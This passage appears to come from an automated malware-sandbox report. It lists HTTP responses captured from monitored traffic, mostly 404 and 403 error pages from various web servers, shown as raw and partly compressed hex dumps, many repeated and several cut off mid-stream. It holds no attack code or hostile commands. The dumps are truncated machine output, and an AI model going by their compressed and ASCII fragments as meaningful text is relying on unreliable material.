Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 23 Jun 2022 13:08:36 GMTetag: "999-62b465d4-7483b18151e2685e;;;"accept-ranges: bytescontent-length: 2457date: Wed, 28 Feb 2024 14:45:17 GMTserver: LiteSpeedplatform: hostingerData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 28 Feb 2024 14:45:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: namecheap-nginxContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 28 Feb 2024 14:45:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: namecheap-nginxContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Feb 2024 14:45:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 28 Feb 2024 14:46:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 28 Feb 2024 14:46:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 28 Feb 2024 14:46:12 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 28 Feb 2024 14:46:15 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 33 6b 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v3ka/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 28 Feb 2024 14:46:36 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 28 Feb 2024 14:46:39 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 28 Feb 2024 14:46:42 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 28 Feb 2024 14:46:44 GMTConnection: closeContent-Length: 5105Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 